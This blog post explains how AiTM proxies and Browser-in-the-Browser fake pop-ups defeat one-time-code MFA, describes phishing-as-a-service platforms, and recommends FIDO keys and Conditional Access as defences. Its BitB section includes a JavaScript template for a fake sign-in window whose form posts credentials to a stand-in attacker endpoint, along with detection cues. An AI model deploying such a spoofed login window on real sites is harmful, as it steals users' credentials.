
Phishing, MFA and other condiments

Over the last few years we have made great strides in protecting our digital ecosystem, and in that sense we can say that we have matured. Cybersecurity has ceased to be an option and has become mandatory in most environments.

This maturation has allowed us to raise the minimum security requirements for a system, and that is where 2FA appears as one more measure adopted for authentication. In this post we explore that context to answer the question: are we doing security, or are we just doing the minimum?

A known bad guy, always in the middle

When we talk about phishing, we stopped long ago limiting it to specially crafted emails. That "art of deception" has run into the protective measures we apply, such as 2FA, and that in turn has driven cybercriminals' interest in bypassing those measures (in a previous post we described some 2FA bypass strategies).

This is how AiTM (Adversary in the Middle) has become especially relevant in recent times. In this technique the attacker acts as a proxy: the victim is shown the real service, but every request and response passes through the attacker's server, which captures the credentials, the one-time codes and the session cookie issued after login. No matter how many authentication factors are used, each one is intercepted and then forwarded to the service we trust; the login succeeds, and the process looks normal to the user.


Wrapped once again

People are not exempt from this maturation in cybersecurity: through awareness training we have acquired tools to respond better to phishing. We look more closely at where we are entering our data, and that is exactly where cybercriminals have focused, exploiting that trust by designing new techniques to draw us into the deception.

A website, at the end of the day, is nothing more than a set of visual elements offering us something we want (or not). We have learned to trust the top bar where the URL appears, but, as in a dream within a dream, how do we know we are not already inside a website? BitB (Browser in the Browser) is a technique designed to show us a seemingly real and valid environment inside a malicious website. It lets the attacker, almost as child's play, recreate every element of a real pop-up window, including the address bar and the padlock that suggests a valid certificate, within the context of the attacker's own page.


The basic implementation of this attack consists of rebuilding, inside the site controlled by the attacker, a structure identical to the one the user recognizes from the real site, in a simple example:
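The skeleton of such a page, as an added example that is not code from the original post: the "window" the victim sees is a styled `div` with a painted title bar, padlock and URL, and the form underneath posts wherever the attacker wants regardless of what the painted URL says. The domains, the `bitb-*` class names and the `/collect` endpoint are hypothetical.

```javascript
// Added example (not code from the original post): the skeleton of a BitB
// page. Everything the victim reads as "the browser" here (title bar, padlock,
// address bar) is ordinary HTML inside the attacker's page; only the real
// tab's address bar belongs to the browser. Domains are hypothetical.

// Builds the fake pop-up as a string so it can be inspected outside a browser.
function fakeWindowHtml({ displayedUrl, title, formAction }) {
  return `
<div class="bitb-window" style="position:fixed;top:120px;left:240px;width:480px;
     border:1px solid #999;border-radius:8px;background:#fff;
     box-shadow:0 8px 32px rgba(0,0,0,.35);font-family:sans-serif">
  <div class="bitb-titlebar" style="background:#f1f3f4;padding:6px 10px">${title}</div>
  <div class="bitb-urlbar" style="margin:6px 10px;padding:4px 8px;border-radius:12px;background:#e8eaed">
    &#128274; <span class="bitb-url">${displayedUrl}</span>
  </div>
  <!-- the form posts to the attacker, whatever the painted URL says -->
  <form method="post" action="${formAction}" style="padding:12px">
    <input name="user" placeholder="Email">
    <input name="pass" type="password" placeholder="Password">
    <button>Sign in</button>
  </form>
</div>`;
}

// The cue a reviewer can check programmatically: where the credentials really
// go versus what the painted address bar claims.
function spoofedOrigin({ displayedUrl, formAction }) {
  const shown = new URL(displayedUrl).origin;
  const real = new URL(formAction).origin;
  return { shown, real, spoofed: shown !== real };
}

// In a browser this injects the fake window into the page; under Node it is a
// no-op, so the template can still be exercised from the command line.
function mountFakeWindow(opts) {
  if (typeof document === "undefined") return null;
  const host = document.createElement("div");
  host.innerHTML = fakeWindowHtml(opts);
  document.body.appendChild(host);
  return host;
}

const demo = {
  displayedUrl: "https://accounts.example.com/signin", // what the victim reads
  title: "Sign in - accounts.example.com",
  formAction: "https://login-example.test/collect",    // where the data really goes
};
mountFakeWindow(demo);
```

The behavioural checks remain the practical ones: a real pop-up is a separate top-level window and can be dragged outside the tab, while the fake one stays clipped inside the page viewport and moves with its content when the tab is scrolled or resized; the text in the painted address bar can be selected like any other page text.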


Integrated into a phishing campaign, these two techniques can be schematized as follows:


We can see that the degree of complexity increases for the attackers and, as with any problem, they have looked for a solution, or bought one.

Vulnerable by a service

PhaaS (Phishing as a Service) has emerged as the attackers' answer: intuitive, "low-cost" platforms that are simple to deploy and that put the tools for effective phishing campaigns in the hands of less technically experienced criminals. They can include customizable phishing kits, dynamic URLs, payloads and activity tracking.

One of the campaigns recently investigated by Mandiant's analysts used a platform called "Caffeine". Its particularity was that registration was open and required only an email address (unlike other platforms with additional requirements). In addition, its templates included Russian and Chinese targets, which is unusual, and the service bundled a large number of detection-evasion techniques.


It is clear that platforms of this type put a complete toolset for such attacks into malicious hands. How do we protect our environment, then? Since AiTM phishing renders obsolete any factor based on OTPs (one-time passwords), whether delivered by email, SMS or an authenticator app, because the code is simply relayed, what is needed is another kind of "phishing-resistant" MFA.


In this field we find, for example, hardware security keys and other implementations of the FIDO authentication standard (whose response is bound to the origin the browser is actually on, so a proxy at another domain cannot reuse it against the real service), and policy models such as Microsoft's "Conditional Access", which can require a compliant or registered device before access is granted.

Discussion

Beyond the measures taken in authentication, there is clearly a new and growing need to "train the awareness" of people in cybersecurity so that they respond more naturally to these kinds of threats, since not every phishing variant targets the authentication process. In a future post we will look at the different MFA methods around phishing-resistant authentication, in particular the FIDO standard.